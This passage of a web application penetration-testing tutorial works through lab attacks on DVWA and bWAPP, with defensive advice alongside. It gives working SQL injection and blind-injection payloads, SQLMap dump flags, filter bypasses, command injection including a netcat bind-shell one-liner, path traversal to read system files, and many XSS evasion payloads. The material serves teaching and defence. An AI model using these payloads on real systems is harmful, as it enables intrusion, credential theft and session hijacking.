Why does the web app return no results? The firewall is filtering quotes, so dvwa
must be encoded as a hex literal of its ASCII bytes. dvwa without quotes encodes
to 0x64767761. The query now changes to:
2 and 1=0 union select null,table_name from information_schema.tables WHERE
table_schema=0x64767761. This turns out to be a successful injection, as seen below.

The tables dumped are guestbook and users, but the focus is on getting the
columns from the users table, so the following command should be executed.
Remember to hex encode users, because passing the command with quotes
returns no results:
2 and 1=0 union select null,concat(table_name,0x0a,column_name) from
information_schema.columns where table_name=0x7573657273
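The hex literals used above are easy to produce programmatically. MySQL accepts a string literal written as 0x followed by the hex of its ASCII bytes, with no quotes required, which is what slips past the quote filter. A small helper (the function name is illustrative):

```python
def to_hex_literal(s):
    # MySQL treats 0x<hex bytes> as a string literal, no quotes needed.
    return "0x" + s.encode("ascii").hex()

print(to_hex_literal("dvwa"))   # matches the table_schema literal above
print(to_hex_literal("users"))  # matches the table_name literal above
```

Running this reproduces 0x64767761 and 0x7573657273, the two literals used in the injected queries.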

There are multiple columns of interest, namely the user and password columns
that exist in the users table as seen above. The avatar, first_name, and last_name
columns will be ignored. The final step is to pull the data from the user and
password columns with the following command:
2 and 1=0 union select null,concat(user,0x0a,password) from users.
No hex encoding needs to be done here, as no quotes are needed in the query.

The username and password dumps were successful.

The next application to be injected into gives even less information, so even more
blind guesswork will have to be employed. Automation should be attempted once
the vulnerability has been properly probed.

Ironman' and 1=1# returns a result from the database saying the movie exists.
Many would find this strange, considering there is no such movie called Ironman;
it is the appended true statement that satisfies the query. This tells the attacker
that, once again, the web application is not separating human input from
programming input.


iron man' AND length(database())=1# is the command executed above; the
attacker is asking whether the database name is 1 character long. The movie
"does not exist" when executing this query. Upon trying iron man' AND
length(database())=5#, the result "movie does exist" is finally returned, verifying
that the database name is 5 characters long.

Next, every character of the 5-character database name must be guessed. This
tedious task starts with the query
iron man' AND substring(database(),1,1)='a'# .
The movie does not exist, therefore the first character cannot be a.
iron man' AND substring(database(),1,1)='b'# is the second query attempted.
With lowercase b the movie does exist, which tells us the first character is indeed
b, as shown below.

Now the second character of the 5-character database name must be guessed, but
the process should be sped up by brute forcing it with Burp. A payload position is
marked and run through A-Z, a-z, and 0-9; the length of each response then
reveals the correct value. Using the brute forcer, the task of ripping through 62
possible values is automated.

The attacker should delete the part of the URL query where the character is being
guessed, replace it with the word payload for clarity, then select payload as the
position to brute force. In place of payload, A-Z, a-z, and 0-9 will be processed
automatically.

The above are the correct brute force options for this attack: it only needs to run
through every possible letter and number once, making a max length of 1
appropriate. As seen in the screenshot below, the second value is obviously W.
Continuing this process reveals the database name is bWAPP, which stands for
buggy web application. As earlier in this tutorial, the attacker finds the hit by
arranging the results by response length in bytes. The w and W payloads produced
a different response length than all the other letters and numbers, which were
equal to each other; this tells the attacker that W is a special payload, and upon
rendering the page it is seen that W is indeed the next character in the string. It
was the 23rd request, and the complete attack finished in less than 10 seconds.

What about the table and column names? Even using Burp Suite with its brute
forcing methods is an exhausting task for this type of blind injection, so attention
will be turned to SQLMap for further automation. SQLMap is a popular Linux tool
for auditing database and web application security.

When configuring the tool, the web address of the vulnerable page as well as the
session cookie must be supplied as parameters before starting the attack. Many
applications vulnerable to SQL injection must be tested during authenticated
sessions, so the cookie parameter is vital to allow SQLMap access.

SQLMap indeed detects that the title parameter is vulnerable to injection. The
tester can defer attacking other parameters in the URL at this point.


Having previously discovered that the database name was bwapp, the attacker
should specify the database to be attacked in order to list its tables. -D bwapp
--tables are the appropriate flags in this example.

SQLMap has brute forced the table names successfully. blog, heroes, movies,
and users exist as tables in the bwapp database, but attention is turned to the
users table.

-T users --columns are the appropriate flags specifying that the attacker wants to
brute force the columns of the users table.


Above, the columns are brute forced and interesting ones are revealed. In this
attack the rows for the columns email, login, and password will be extracted.
The proper flags -D bwapp -T users -C email,login,password --dump instruct
SQLMap to dump the email, login, and password column data from the users
table in the bwapp database.

The accounts are dumped, and the weak hashes are cracked automatically by
SQLMap, revealing that the username bee has a password of bug. Interestingly,
the user shawn has a hashed password that could not be cracked by the default
wordlist inside SQLMap. The attacker should submit this hash to one of the many
free online cracking services that use large rainbow tables.


This is performed and the hash is cracked. The password is revealed to be nyit.
SHA-1 is not a suitable hashing method regardless; at least salted SHA-2 should
be used.
SQLMap proved more efficient at dumping the database than the Burp method. It
should be noted that SQLMap did not use Boolean-based blind brute forcing keyed
on page responses, but time-based blind injection. The idea is the same, extracting
data byte by byte based on conditional responses from the web application, but in
this case a time delay is injected. If the server's response takes abnormally long,
that reflects a true condition, answering the attacker's yes-or-no question. For
example, SELECT * FROM users WHERE id=5-SLEEP(15) injects a sleep command
for 15 seconds; an abnormally long response confirms the condition being tested.
This is painful to do manually,
so thankfully tools like SQLMap automate this process for blind and deep blind SQL
injection.
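The time-based oracle can be simulated without a database. The fake_server function below stands in for a query containing a SLEEP() call; the 0.2-second delay is a scaled-down assumption for the demo, not SQLMap's actual timing logic.

```python
import time

# Scaled-down delay standing in for SLEEP(15) in the injected query.
DELAY = 0.2

def fake_server(condition_true):
    # A vulnerable server sleeps only when the injected condition holds.
    if condition_true:
        time.sleep(DELAY)

def probe(condition_true):
    # The attacker measures wall-clock time to read the hidden boolean.
    start = time.monotonic()
    fake_server(condition_true)
    return (time.monotonic() - start) > DELAY / 2  # "abnormally long"?

print(probe(True))   # condition held, so the server slept
print(probe(False))  # no delay, so the condition was false
```

The channel here is purely timing: no page content or error is needed, which is why this works even against completely silent applications.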
SQL injection prevention is complex and a defense in depth approach in
layers is the best suited approach to securing applications against code injection
attacks. Firstly, all databases should be target hardened. This implies that
appropriate permissions for databases are used. Databases that interact with the
web application rarely need administrative type of access, and therefore admin
access privileges of the web app over the database should be stripped. The type of
functionality and the purpose of the database need to be taken into account. For a
database that performs read functions more than 80 percent of the time, write
permissions by the web app to that database should be completely disabled.
A different account should be used entirely just for performing a write on a query in
this situation. This severely limits the effectiveness of an attacker where
exploitation exists. Though accounts should be divided permission wise based on
their functions, the database as a whole should remove functions it does not use.
The less functions an attacker can utilize, the less effective the injection attempts.
Many issues will arise with an attacker trying to inject into a database where the
functionality is neutered and tailored specifically for the applications use, and not
for an attacker looking to leverage queries. Enterprise databases come out of the
box with a large amount of default functions enabled, so this should be looked into
thoroughly. Patching is hugely important as well. Database admins should use a
subscriber based patching mechanism, where live patches are rolled out in real time
as soon as an exploit is discovered in the wild. This is important if the fix has not

yet been pushed by the actual vendor. Filtering and blocking of queries must be
applied as well. In this tutorial, quotes have frequently been used to execute
statements. The obvious solution is to sanitize single quotes submitted by the
user, perhaps by doubling them, which would successfully throw off the syntax of
the malicious query. Unfortunately this is not enough; in one of the attacks above,
this filtering method was defeated by submitting the data as hex-encoded ASCII.
What about a filter blocking the ORDER BY statement? The following bypasses
could work: OrDeR, %00ORDER (%00 is a URL-encoded null byte, which should be
filtered), ORORDERDER (order is filtered once, allowing the hidden order to pass),
and URL encoding the characters as %4f%72%44%65%72.

Ultimately, combinations of whitelists and blacklists and proper escaping of certain
characters should also be applied to stop injection, but parameterized (prepared)
statements are perhaps the most crucial defense. Stored procedures, a related but
distinct mechanism, are likewise more secure than constructing full SQL queries
without set placeholders for data. APIs that use parameterized statements apply
the logic first mentioned when discussing why injection can occur at all: the
application can discern human input from SQL programming by forcing user input
to never become part of the query structure. A malicious user may pass a
username to the database, but the application binds it into a prepared statement
that fixes the structure of the query before the string is set and executed. Nothing
in the input can escape the username parameter and be applied as SQL. The code
from The Web Application Hacker's Handbook illustrates proper API code to
sanitize user input:
// define the query structure
String queryText = "SELECT ename,sal FROM EMP WHERE ename = ?";
// prepare the statement through DB connection con
stmt = con.prepareStatement(queryText);
// add the user input at the first ? placeholder
stmt.setString(1, request.getParameter("name"));
// execute the query
rs = stmt.executeQuery();

Analyzing the above code, it is seen that in ename = ? a placeholder is used rather
than user input being passed straight into the query text. The statement is
prepared and the parameter is bound to it before execution. Also notice setString
being applied to the parameter: the input is bound strictly as string data, so it can
never be executed as SQL. When applying parameterization, it should be done for
every query, not just the queries developers assume are more important. Going
further, all supplied query data needs to be parameterized. Developers have used
prepared statements that did not parameterize all submitted data, instead
allowing some data to be concatenated into the string, allowing injection to occur.
Placeholders cannot be used for column and table names. In the rare case where
the application does need to choose a column or table from user supplied data,
heavy whitelisting should be applied so that nothing outside the existing tables
and columns can be submitted, together with length limits, input validation, and
character restrictions (allowing only alphanumeric characters and no special
characters). It was seen in the attacks how much harder injection was when errors
were not dumped to the attacker, forcing blind injection methods. Though this
won't stop a determined attacker, the application should never dump errors to the
client. Again, a defense in depth approach is far superior to any single defense
mechanism.
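The Java JDBC example above has a direct counterpart in most languages. A Python sketch using the standard library's sqlite3 module (the emp table mirrors the handbook example; the in-memory database and lookup helper are illustrative):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE emp (ename TEXT, sal INTEGER)")
conn.executemany("INSERT INTO emp VALUES (?, ?)",
                 [("shawn", 50000), ("pablo", 40000)])

def lookup(name):
    # The ? placeholder binds the input as pure data; it can never change
    # the structure of the query, exactly like setString in the JDBC version.
    return conn.execute(
        "SELECT ename, sal FROM emp WHERE ename = ?", (name,)).fetchall()

print(lookup("shawn"))             # one matching row
print(lookup("shawn' OR 1=1 --"))  # empty: the payload is just an odd name
```

Compare this with the concatenation flaw exploited earlier: the same tautology payload that dumped every account now matches nothing, because it is treated as a literal string.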

OS Command Injection
Numerous web applications employ utilities for a user to interact with
the application in a manner that allows the user to view directory contents, or ping
addresses to test availability. Web applications meant for administration of servers,
printers, and firewalls usually will employ built in interfaces that allow the user to
make calls to the operating system. Being able to access the operating system
from an application allows powerful features for users to use network functions,
interact with other processes, and make changes that are relevant to their account
at a file system level. The caveat of allowing direct operating system commands
passed to the server is that this opens a large vulnerability for command injection
that is outside the scope of what the application intends. An example, which will be

shown to be exploited, is a web app that allows users to ping a website or ip of their
choice. A vulnerable web application could allow a malicious user to use escape
characters such as ;, |, and && to break out of the original command and add
their own input, effectively allowing remote command injection. The web
application's permissions on the server are usually sufficient that command
injection can be leveraged to gain back-end access to the entire server through a
remote shell, with subsequent privilege escalation possible from there.
When testing for command injection flaws, a tester should crawl through the
application's contents and note any functions that probe the server's file system or
perform process functions, like pinging. It is important to note that user supplied
data does not have to be submitted only through a visible function of the
application: the penetration tester should analyze all cookies, URL parameters,
and form fields to see if input that interacts with the server is passed through
these mediums as well. The shell metacharacters that allow custom OS injection
must be understood, as they differ according to the underlying server OS, namely
whether it is Windows or Linux based. The focus will be on ;, |, and &, the shell
metacharacters commonly used to conjoin commands. Utilizing && will allow the
second command to run only if the first command succeeds; doubling to || allows
the second command to run even if the first command failed.
Commonly, web applications will be vulnerable to command injection even though
nothing in the application's output directly shows successful execution of the
commands. An attacker can still test whether commands are reaching the server
through a blind process, and attacks demonstrating these techniques will be
shown. Instructing a web application through command injection to ping itself for
a fixed duration, then watching the application's response, can verify a blind
injection. Executing ping -n 50 127.0.0.1, for example, is a tactful move by a
tester to infer blind injection: this command should cause the application to hang
on the submitted request while the server pings itself (127.0.0.1 being the
loopback ip). If interacting with a web application with a Linux back end, a
command such as ping -c 60 127.0.0.1, where -c denotes the number of ping
requests to send, should show a noticeable effect on the application.
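The danger of the metacharacters discussed above, and one way code can neutralize them, can be sketched with Python's standard library. The malicious "IP address" below is a hypothetical payload of the kind used in these attacks:

```python
import shlex

user_input = "127.0.0.1; cat /etc/passwd"  # attacker-supplied "IP address"

# Concatenated into a shell string, the ; would start a second command.
# shlex.quote wraps the input so every metacharacter becomes literal text:
quoted = shlex.quote(user_input)
print("ping -c 1 " + quoted)

# Safer still is an argument-list API with no shell at all, e.g.
# subprocess.run(["ping", "-c", "1", user_input]), where ; | && have no meaning.
```

Either approach prevents the chaining tricks shown in the screenshots; passing the raw string to a shell is what makes them possible.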


The above shows a normal site, allowing you to view the contents of a folder that
you have created. You cannot create or execute files though, or seemingly do
anything else.

In the second screenshot, escaping using the ampersand character and injecting
custom commands is attempted, and seemingly successful.


Screenshot 3 shows the ipconfig output and directory contents dumped successfully.

Using the | character worked as well to execute commands. The site security was
then stepped up to filter command joining characters. In the following shot, an
injection of | ping fails because of character filtering by the application.

The && characters are reused after | fails to perform a successful injection. If this
is filtered as well, one could attempt ;. The semicolon allows everything before it
to be executed, and anything following it is passed to a new line for execution.
Other separators to try include $() and backticks. Further filter evasion can be
attempted by performing %0A ipconfig %0A, for example; %0A is simply the URL
encoding of a newline, used to bypass filters and still allow the command to be
passed.

The next shot shows even more security, as nothing is returned to the user upon
input, but a blind injection can still be tested for. The injected command instructs
the server to ping itself (127.0.0.1, the loopback ip) for 30 seconds. If the web
application is unresponsive for approximately 30 seconds, that may confirm OS
commands are still being passed.


The application gets stuck for 30 seconds, so if the tester sees it hang on
Connecting, that is a good sign that command injection is still successful. This is
not the only method of blind command execution testing: a tester can invoke the
application to send them an email, ping a website in their control, or write files to
an area accessible by the browser. The following screenshots show the write-file
test to be a successful method.

For example: echo "insert whatever text you want" > nyit.txt. If this text file gets
created, the tester knows the application is exploitable for more nefarious attacks.
Also worth mentioning: if one can add files, this is a pathway for an attacker to
add shell scripts and other infectious payloads that can cause complete
compromise of the server.


The file was purposely written to an area of the site a basic user has access to, and
as expected, the custom nyit.txt file was created, verifying command injection is
possible even if not overtly stated by the application.
The next attack will outline getting a shell on a website by hacking an
application through remote command injection. This website lets you ping other
sites to see if they are online. The problem is, this command is passed to the OS
through the user input, allowing us to use escape characters to execute custom
commands against the operating system.

The web application certainly functions correctly, as it indeed pings the IP address
I specified, but I have chained a more nefarious command to the IP.
;mkfifo /tmp/pipe;sh </tmp/pipe | nc -l 1337 > /tmp/pipe is the appended
command. It instructs the server to open a netcat listener on port 1337 for the
attacker to connect to; the named pipe is what wires the attacker's input and
output to a shell on the OS. This is done blindly, but if a connection can be opened
from another machine running netcat, success is verified.

The above command is the other machine attempting to connect to the web
server using netcat, at the server's address and the port it is listening on.

The connection is confirmed open based on the terminal output. The web
application's back-end OS is compromised.

With complete access to the site's server, I execute some Linux commands to view
information about the logged-in users. From here further damage and exploitation
are possible, as well as further privilege escalation.

The best way to stop OS command injection is to use APIs that handle the exact
function the website intends to perform, with no extra functionality that can be
leveraged against the server. This way the end user is limited, and the web
application has a division of labor where no direct operating system calls can be
made. Furthermore, applications should utilize pure command APIs that launch a
process by direct invocation with its own command parameters, instead of going
through a shell interpreter. The shell interpreter is what supports the very
command chaining and shell metacharacters that allow custom command
execution outside of the application's built-in function. In some situations the
application absolutely must support direct command input being passed to the
server. If this must occur, severe character whitelisting is encouraged. Using the
ping-a-website application as an example, it failed to whitelist only numbers and
the . character. A character limit should also be imposed; there is no reason a
function that only takes numbers and dots should ever accept any other
characters. Command injection is dangerous, so disallowing user supplied input to
any dynamic or include function is far superior to relying on filtering, as it removes
command injection as a possibility.
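The whitelist just described for the ping function can be sketched concretely. The policy below — digits and dots only, IPv4-shaped, hard length cap — is an assumed interpretation of the advice above, and the function name is illustrative:

```python
import re

# Assumed policy: 1-3 digit groups separated by dots, max 15 characters.
IP_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def is_allowed_ping_target(value):
    # Reject outright anything that is not IPv4-shaped; metacharacters
    # like ; | && never even reach the command layer.
    return len(value) <= 15 and bool(IP_RE.fullmatch(value))

print(is_allowed_ping_target("127.0.0.1"))                   # accepted
print(is_allowed_ping_target("127.0.0.1; cat /etc/passwd"))  # rejected
print(is_allowed_ping_target("8.8.8.8 && whoami"))           # rejected
```

Whitelisting what is allowed, rather than blacklisting known-bad characters, is what defeats the encoding and doubling bypasses shown earlier.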

File Path Manipulation

Many functions exist within applications where the app reads and writes
to the file system. More specifically, there are functionalities where user submitted
input is passed to the application as a filename: the application takes a filename
as a parameter, or fetches user data from the appropriate directory of the local
file system as specified by the user.
The actual vulnerability exists when the application reads or writes to the
filesystem in such an unsafe manner that it allows an attacker to submit
malformed input that changes how the application interacts with the file system.
Most commonly this comes in the form of inserting path traversal sequences into
a URL parameter. The path traversal attack is also known as the ../ attack,
because attackers can keep inserting the traversal sequence until they break out
into an outside directory. Effectively used, an attacker can read unauthorized files
or make unauthorized writes.
Looking for path traversal vulnerabilities can be difficult because of their subtle
nature. The tester should focus on obvious functions where the application
explicitly interacts with the file system: notably any upload or download function,
any function where users submit images or documents, or document sharing
across a workspace.
Applications attempt to filter the characters used to perform traversal.
This is good practice but can be defeated with custom encoding techniques. An
attack will be shown where encoding the traversal payloads defeats a filter. The dot
and slash can be encoded as URL, double URL, UTF-8, and 16-bit Unicode. With
that being said, filters need to be mindful of the different encoding schemes that
the ., the /, and the \ can take. It has been seen on some Windows application
servers that the filter only blocked the \, since that is the Windows default directory
separator. Developers forget that both the \ and the / can be used for traversal,
though on Linux servers it is necessary to use /.
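As a small sketch, the single and double URL encodings of the traversal sequence can be produced and checked with Python's standard library (here double encoding re-encodes only the percent signs of the first pass):

```python
from urllib.parse import unquote

def url_encode_all(s):
    # Percent-encode every character, including the dots, which plain
    # urllib.parse.quote would leave untouched as "unreserved".
    return "".join("%{:02X}".format(ord(c)) for c in s)

single = url_encode_all("../")          # %2E%2E%2F
double = single.replace("%", "%25")     # %252E%252E%252F (double URL encoding)

# A filter that decodes only once sees harmless-looking text; a second
# decode restores the raw traversal sequence.
print(unquote(single))           # ../
print(unquote(unquote(double)))  # ../
```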
Besides heavy sanitization, blacklists, and whitelists, developers can
also look to simply not pass user input to the file system where it isn't
necessary. Most files can simply be placed in the web root and accessed by
URL instead of being passed as a parameter to a file system API. If this cannot be
done, hard coding the allowed file types is necessary; if the application is meant to
fetch pictures, restricting input to JPEGs should be enforced. Finally, after input
validation via filters, the application should use the proper APIs to verify that the
file being accessed exists within the appropriate directory and not outside of it.
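A minimal sketch of that final check, assuming a POSIX-style path layout (a production server would use os.path.realpath so symbolic links are resolved as well):

```python
import posixpath

BASE_DIR = "/var/www/app/images"  # hypothetical storage directory

def is_safe_path(filename):
    # Normalize the requested path, then confirm the result still
    # sits inside the intended directory before touching the disk.
    resolved = posixpath.normpath(posixpath.join(BASE_DIR, filename))
    return resolved == BASE_DIR or resolved.startswith(BASE_DIR + "/")

print(is_safe_path("cat.jpg"))                 # True: stays in BASE_DIR
print(is_safe_path("../../../../etc/passwd"))  # False: escapes BASE_DIR
```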
Two traversal attacks will be launched: first a simple attack, followed by a more
advanced attack using automation and payload encoding to bypass filters.


Let us see if it is possible to traverse out of the current directory storing this photo
and reach the C:\windows\win.ini configuration file.

Looking at the URL, it took three traversal sequences to complete the attack. While
simple and effective, it should never be this easy.


Since anyone reading this is by now familiar with Burp, some previous steps
(intercepting the request) will be skipped. Above, the URL is sent to Burp and an
automated attack to bypass the site's filter will be launched. The payload position is
where the traversals will be placed.


A preloaded list of path traversal payloads, including filter-defeating variants, is loaded.

The attack is completed and the results are ordered by the length in bytes of the
application's response. The second pane on the bottom shows the win.ini
configuration file has been read by the application as specified. The application
is vulnerable to path traversal when double URL encoding is performed on the
traversal characters.

Attacking Users with Cross Site Scripting (XSS)

Most of the attacks described previously looked to leverage
vulnerabilities and weaknesses within the server side of the web application, and as
time goes on these vulnerabilities are becoming less common. The number one
attack found in the wild, which may bypass owning a web server entirely, concerns
itself with compromising the client-side user. XSS attacks are extremely powerful,
and given that users of an application have different browsing behavior, browsers,
and plugins, attacks against users can be far more profitable and painless than
breaking into an application with server-side defects. Launching a client-side attack
against thousands of users to steal credentials or log keystrokes with simple XSS is
a more obvious choice for an attacker than trying to break into a hardened financial
corporation's server. There are multiple derivatives of XSS and multiple ways to
inject them into web applications to attack users.
Reflected XSS attacks account for roughly 75 percent of all XSS attacks.
Web application developers prefer to deliver dynamic content via URL parameters,
as this spares them from creating individual custom pages for each way a user
interacts with the application. For a better understanding, consider error pages.
Consider a custom error page delivered to all users who put the wrong input into a
credit card form field: alert=incorrect+input. The page comes up and the message
"incorrect input" is displayed, allowing a tester to infer that the alert parameter is
being sent back to the client, embedded in the HTML returned by the server. This
creates the possibility of crafting custom input in the alert parameter, such as
malicious JavaScript, which can be used to hijack users' sessions, among other
things. There is a far simpler test for reflected XSS than a complex JavaScript
payload: a simple alert box popup can test whether the site is potentially
vulnerable to a reflected attack. If a user clicks on the link and a JavaScript alert
box executes on the page, this is a problem. It is now clear why this type of XSS is
referred to as reflected, as the application reflects the attacker's payload back into
the user's browser.
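A minimal sketch of the reflection (the page template here is hypothetical): the vulnerable handler pastes the parameter straight into the response, while HTML encoding renders the same payload inert:

```python
import html

def vulnerable_page(alert_message):
    # Unsafe: the URL parameter is reflected verbatim into the HTML.
    return "<p>Error: {}</p>".format(alert_message)

def encoded_page(alert_message):
    # Safer: the parameter is HTML encoded before reflection.
    return "<p>Error: {}</p>".format(html.escape(alert_message))

payload = "<script>alert()</script>"
print(vulnerable_page(payload))  # the script tag reaches the browser intact
print(encoded_page(payload))     # &lt;script&gt;... renders as harmless text
```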


A basic application that takes a user's name and delivers it back dynamically is seen
here. The name parameter is of interest to test.

A tester can now enter a payload in the name parameter, the easiest being
an alert box such as <script>alert()</script>. Reloading the link shows the script
was executed in the client's browser.

A more practical example would be a situation where a user logs into a
website and receives a cookie so their session can be validated and tracked. A
malicious attacker who has found a reflected XSS vulnerability on that site can
insert a payload that instructs the client, upon clicking the link, to send their cookie
in a request to the attacker's domain. When the user gets phished into clicking the
link, thinking it is safe, the token is sent across domains, and the attacker can then
log in with that session cookie. The lack of dynamic cookies points back to previous
sections of this report, where static cookies were shown to be generally insecure.
There is common confusion pertaining to XSS where individuals wonder why an
attacker who is able to inject custom scripts cannot just send the user of a
particular site to the attacker's own page and have the user's token stolen from
there. Why must the attacker actually inject into the target website and have the
application send the token to their hosted malicious site? Browsers implement a
security control known as the Same Origin Policy, which disallows cookies from
being transmitted to domains other than the one that issued them. XSS defeats this
in a way, as it has the vulnerable site send the token on the attacker's behalf. The
term cross-site scripting should make much more sense at this point.
The second type of XSS is known as stored, persistent, or second-order
XSS. Instead of being reflected by a URL, the malicious script is stored in the actual
database of the web application. This could be, for example, a messaging inbox for
an admin, a forum post, or any area of an application where content can be
submitted and viewed by other users. This is far more dangerous than reflected
XSS for a number of reasons. Reflected XSS involves sending a link to a user and
hopefully coercing them to click on it during their actual session, if the intent is to
hijack cookies. With stored XSS, the application spreads the script for you,
eliminating the need to send links to users. Also, a user being hit by a stored XSS
attack is by definition already in a current session and interacting with the web
application.

Seen above is another seemingly normal web application that involves submitting a
name and a message to sign a guestbook. Upon submission, the input is stored in
the database and returned back to the browser. The above payload tests for a
stored XSS vulnerability.

The application is proven to be vulnerable: every time a user loads the page to sign
the guestbook, the alert box is triggered.
The two previous XSS attacks relied on the server returning a response
page that carries the attacker's code. DOM-based XSS utilizes a different method:
the payload is never dynamically delivered in a server response. Instead, when a
victim follows the crafted link, client-side script already on the page pulls the
payload out of the DOM and executes it. DOM-based XSS is not necessarily
detectable server side, as the code is never seen by the server. When the browser
accesses the vulnerable URL, it begins to build the DOM by pulling attributes from
objects referenced by specific properties (e.g., document.URL). The document
objects that contain the payload are added to the relevant property, and the
malicious script is parsed into the HTML. The attack is mounted and most likely
successful at this point.


Above, a command is issued in Firebug. The localStorage.setItem command will
effectively add data to the tester's local DOM storage.

The DOM storage is subsequently checked using Firebug, and it is confirmed that
the pair "Attack Attempt", "Confirmed" was actually added using setItem.

The tester in the figure above is now able to test for injection. The above code
instructs a browser to run a script that adds ("SCRIPT", "EXECUTED") to the DOM
storage. Anyone visiting this page will have this injection run when the browser
builds the page.


The blog posting is successful, and no malicious code explicitly shows up. Logged in
as another user, the tester should visit the same page and check their local storage
to see if the script ran. If the user is exploited, the browser's local DOM storage will
reflect what the payload instructed.

The DOM storage is checked, revealing a massive issue: the user has run the
malicious payload. This test confirms the vulnerability, but a more malicious
payload would be used by an actual attacker. Executing a Trojan, logging
keystrokes, stealing credentials, or defacing the page itself are just some of the
many methods an actual attacker could leverage against users' browsers.
XSS attacks are very versatile in their attack vectors. Virtual
defacement occurs when the site's contents are not physically changed, but the
XSS attack displays content on top of the site or performs a deceptive redirect to
defacement content. This ranges from simple mocking photos to defamatory
statements that could cause financial gain for the attacker and financial ruin for the
victim site. Visualize an attacker who executes a script on the victim site
announcing it is out of business and that a partner site should be visited instead
(with an appropriate link, of course). Another example, as mentioned previously, is
session hijacking and privilege escalation. If an admin gets their session token
compromised by an XSS attack, the attacker can place a Trojan form on the site
with the escalated privileges they have just received. The Trojan form would
effectively log the account details of all members who log in. Most troubling,
imagine a shopping application being exploited by a stored XSS injection: when the
user goes to the checkout page, they are prompted with a credit card form field
that is not actually from the company. These attacks are devastating because the
attacker does not need to phish victims into going to a different site hosted on
another domain and server; the SSL certificate stays the same because the attack
lives on the actual victim site. To further complicate things for victim sites, the
nature of stored XSS allows attacks to take on worm-like qualities. The famous
MySpace stored XSS attack is a good example of this. The attacker created a
payload that caused any user visiting his page to automatically add him as a friend;
to make matters worse, the script was then injected into the visitor's page as well.
This accomplished two things: it caused mass exploitation of many users with little
legwork from the actual hacker, and in a sense it made it harder to trace the source
of the offense. Because of this propagation quality, attackers can exploit users to
act as zombie offenders: the victim gets hit with a payload that performs malicious
activity against the application from their own account, acting on the attacker's
behalf.
The delivery of reflected and stored XSS attacks comes in multiple
flavors. Simply spamming links on forums and sites can be a hit-or-miss method of
exploiting users. Sending targeted emails to specific users, or mass mailing spam
with the malicious link, can be effective. Attackers will also host their own website
with interesting, click-worthy content that is actually a haven for infecting users.
Other attackers will essentially pay for victims by paying more popular sites, or the
target site itself, to host the attacker's ads; when the ad gets clicks, they get
infections or sessions depending on the vector. It is extremely common for websites
to employ a mechanism where a user can contact the administrator of the site, or
use a tell-a-friend feature of some sort; these are a haven for POST-request stored
XSS attacks. It should further be clarified that a reflected XSS attack typically
requires the generation of a GET request, where a stored attack employs a POST.
Most of the stored attacks discussed thus far would be classified as in-band attacks,
where the script executes on the application because of input submitted through a
form field that is integrally built into the application. Out-of-band attacks differ in
that a different channel is used to deliver the attack, but ultimately the script still
executes on the application's domain: for example, a payload sent through email,
which hits an SMTP server first but only becomes malicious when the HTML is
rendered in the web application's email client.
Finding XSS vulnerabilities is not limited to popping a weak alert box with
an arbitrary message. For example, <script>alert(document.cookie)</script>
displays the user's cookie, and would most likely be chained with further script to
send it to an attacker.


Injecting the script <img src="""",'height=800,width=800');> causes the
application to redirect to another site when the first site fails to open. This payload
could be used to redirect users to a malicious site that serves malware.
Applications will look to sanitize data by escaping characters, applying
whitelists, blacklists, etc. There are many ways to circumvent these filters: using
encoding, using different tagging characters, changing case, doubling characters
that get escaped (<scr<script>ipt>), combining multiple scripting languages, or
working around the . character when it is being blocked.
The most basic filters will without a doubt block the <script> tag.
Fortunately, there are ways to circumvent this. An example from The Web
Application Hacker's Handbook specifies <object
data=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==> as an
often effective bypass. The base64-encoded string
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== decodes exactly to
<script>alert(1)</script>.
Using different event handlers to invoke scripts is effective as well.
Consider, for example, <a onmousemove=alert('EXECUTE')>. Common sense tells
the tester that this would be invoked as soon as the mouse moves over the
element, and it avoids commonly filtered tags in the process.
<embed src=javascript:alert('test')> is an example of pseudo-protocol
script code that will execute in some browsers as well. The javascript: pseudo-protocol
has the advantage that it may bypass certain filters where the attribute being
injected into is expected to receive a URL.
Bypassing filters can also be done by manipulating the tag name.
Consider the original example of <img onerror=alert("hack") src=b>. Simply
changing the case of the tag to iMg can bypass filters. The use of null bytes or
spaces inserted within the tag can also bypass filters: <[%00]img
onerror=alert("hack") src=b> or <i[%00]mg onerror=alert("hack") src=b> are
good examples of this. More tag manipulation includes adding characters after the
tag name and before the first attribute. Consider these examples: <img/
onerror=alert("hack") src=b>, <img/BYPASSPLEASE/ onerror=alert("hack")
src=b>, and <img [%0a] onerror=alert("hack") src=b>.
An attacker can use the same null-byte bypass on the attribute name,
not just the tag. This will evade many signature-based filters, e.g., <img
on[%00]error... .
The attacker can also manipulate the attribute delimiters, eliminating
the whitespace that normally follows an attribute value: for example, <img
onerror=alert("hack")src=b>. The attributes can be manipulated further by
changing their order and adding backticks to make the filter think there is no event
handler present, e.g., <img src=`b`onerror=alert('HACKED')>.
Attribute values are decoded by the browser before being passed on to
the ensuing application, which means that parts of attribute values can be HTML
encoded to pass some filters. This is an example of the a in alert being HTML
encoded to bypass a filter: <img onerror=&#x61;lert("hack") src=b>. Further
tricking of filters is possible: the way HTML decoding works allows an attacker to
pad the encoded character with leading zeros, producing variants like &#x061;,
&#x0061;, &#x00061;, and &#000097;. That is not all: both hexadecimal and
decimal formats can be used, and the attacker can also try variations where the
trailing semicolon is omitted.
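This decoding behavior can be checked directly with Python's standard library: each padded hex or decimal spelling below is just another name for the letter a, which is why a filter must decode entities before matching:

```python
import html

# Leading-zero, hex, and decimal entity spellings of "a" (0x61 = 97).
variants = ["&#x61;", "&#x061;", "&#x0061;", "&#x00061;", "&#97;", "&#000097;"]
decoded = [html.unescape(v) for v in variants]
print(decoded)  # ['a', 'a', 'a', 'a', 'a', 'a']
```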
A powerful means of filter bypass is to employ the encoding methods of
UTF-7, US-ASCII, and UTF-16. For example, <script>alert(1)</script> encoded as
UTF-7 is +ADw-script+AD4-alert(1)+ADw-/script+AD4-.
The challenge with these encoding methods is getting the browser to actually
process the response with the correct character set; intercepting and modifying the
Content-Type header can allow this to work.
Other escape methods can be used as well: Unicode escapes,
hexadecimal escapes, and even octal escapes.
Example of a Unicode escape in alert: a\u006cert.

Beating sanitization by removal involves multiple creative steps. Apply
<script><script>... if the filter does not strip <script> recursively. Where
multiple steps of sanitization are attempted, effort should be made to analyze their
order: applying <scr<object>ipt> would allow a successful injection if the filter
strips the <object> tag after it has already checked for <script>, reassembling the
script tag.

